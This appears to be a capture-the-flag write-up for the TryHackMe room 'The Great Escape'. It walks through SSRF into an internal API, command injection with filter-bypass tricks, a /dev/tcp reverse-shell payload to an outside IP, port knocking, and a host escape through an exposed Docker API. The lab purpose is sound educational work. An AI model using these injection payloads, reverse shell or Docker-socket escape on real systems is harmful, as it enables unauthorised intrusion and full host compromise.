The Great Escape

5 min readAug 13, 2021

Room link: https://tryhackme.com/room/thegreatescape

Enum

Nmap

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http22/tcp open  ssh?
| fingerprint-strings: 
|   GenericLines: 
|_    m6"<
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open  http    nginx 1.19.6
|_http-favicon: Unknown favicon MD5: 67EDB7D39E1376FDD8A24B0C640D781E
| http-methods: 
|_  Supported Methods: HEAD
| http-robots.txt: 3 disallowed entries 
|_/api/ /exif-util /*.bak.txt$
|_http-server-header: nginx/1.19.6
|_http-title: docker-escape-nuxt
|_http-trane-info: Problem with XML parsing of /evox/about

Port 80

Main page

/robots.txt

SSRF

Using the exif-util hint we find another endpoint that is vulnerable to SSRF techniques.

Sending this to burp I tested a few more ports to see what was available internally.

Intruder setup

Results

I found port 8080 to be open internally.

Looking at robots.txt again I noticed another hint.

# Disallow: /exif-util
Disallow: /*.bak.txt$

/exif-util.bak.txt

This file shows a new endpoint to play with. This must be the call to the internal web app. Let’s call it to see the response.

http://api-dev-backup:8080/exif

Calling the server url, then calling the internal port 8080 with a new URL parameter gave a different response to banned words.

http://10.10.31.233/api/exif?url=http://api-dev-backup:8080/exif?url=/etc/passwd

I quickly worked out we can use command injection here to get some results.

http://10.10.183.57/api/exif?url=http://api-dev-backup:8080/exif?url=;ls -la

I was still blocked on the banned words. So tried a few tricks from here: https://book.hacktricks.xyz/linux-unix/useful-linux-commands/bypass-bash-restrictions

Then I was able to bypass the bad word filter with a simple ‘’

Using this technique I started to enum the system before I attempted to get a reverse shell.

Bypass chars

$IFS   # Spaces
''     # Break a word upEg:
exif?url=;cat$IFS/etc/pas''swd
exif?url=;cat${IFS}/etc/pas''swd

Further testing and results.

Sent: http://10.10.183.57/api/exif?url=http://api-dev-backup:8080/exif?url=;idResponse: uid=0(root) gid=0(root) groups=0(root)
Sent: http://10.10.183.57/api/exif?url=http://api-dev-backup:8080/exif?url=;hostnameResponse: api-dev-backup

User

Doing some more enum on the main url showed some interesting results.

dirb http://10.10.16.111/ /usr/share/seclists/Discovery/Web-Content/common.txt

Curling the request and we get the flag for user.

Root (Docker Container)

I started to craft a payload that would work to bypass the word filter.

a="ba";b="sh";echo "$a$b -c '$a$b -i >& /dev/tcp/10.8.153.120/9999 0>&1'"

This also failed. Looking again I worked out its best to close the first command being sent.
So Curl is the first command to run.
So null that command with ‘’;
Now enter any other command.

'';/bin/ba''sh -c "id"
http://10.10.3.112/api/exif?url=http://api-dev-backup:8080/exif?url='';id Retrieved Content
               ----------------------------------------
               uid=0(root) gid=0(root) groups=0(root)

After many attempts to get a reverse shell, I quickly realised it was not going to happen. I then started manual enumeration.

Knowing we were already root. I started there.

dev-note.txt

Hey guys,Apparently leaving the flag and docker access on the server is a bad idea, or so the security guys tell me. I've deleted the stuff.Anyways, the password is fluffybunnies123Cheers,Hydra

Also we note a git repo here too. Let's start to enumerate that too.

http://10.10.3.112/api/exif?url=http://api-dev-backup:8080/exif?url='';cd /root; git log

Let's see the changes on the commit ids.

http://10.10.3.112/api/exif?url=http://api-dev-backup:8080/exif?url='';cd /root; git show 4530ff7f56b215fa9fe76c4d7cc1319960c4e539

Awesome! we get the flag and a hint to open a port for docker tcp.

Port Knocking (root flag)

Ports to knock.

knock 10.10.3.112 42 1337 10420 6969 63000

Before

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http

After

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
2375/tcp open  docker

Now we have a new port open, time to connect and see what's on it.

Using the info here: https://book.hacktricks.xyz/pentesting/2375-pentesting-docker, It was easy to enum the target.

curl -s http://10.10.3.112:2375/version | jq
#or
docker -H 10.10.3.112:2375 versiondocker -H 10.10.3.112:2375 imagesREPOSITORY                                    TAG       IMAGE ID       CREATED         SIZE
exif-api-dev                                  latest    4084cb55e1c7   7 months ago    214MB
exif-api                                      latest    923c5821b907   7 months ago    163MB
frontend                                      latest    577f9da1362e   7 months ago    138MB
endlessh                                      latest    7bde5182dc5e   7 months ago    5.67MB
nginx                                         latest    ae2feff98a0c   8 months ago    133MB
debian                                        10-slim   4a9cd57610d6   8 months ago    69.2MB
registry.access.redhat.com/ubi8/ubi-minimal   8.3       7331d26c1fdf   8 months ago    103MB
alpine                                        3.9       78a2ce922f86   15 months ago   5.55MB

After trying a few containers, I found one that let me login and had the filesystem for the host on.

docker -H 10.10.3.112:2375 run --rm -it -v /:/host/ nginx chroot /host/ bash

Now we can get the real root flag and complete the box.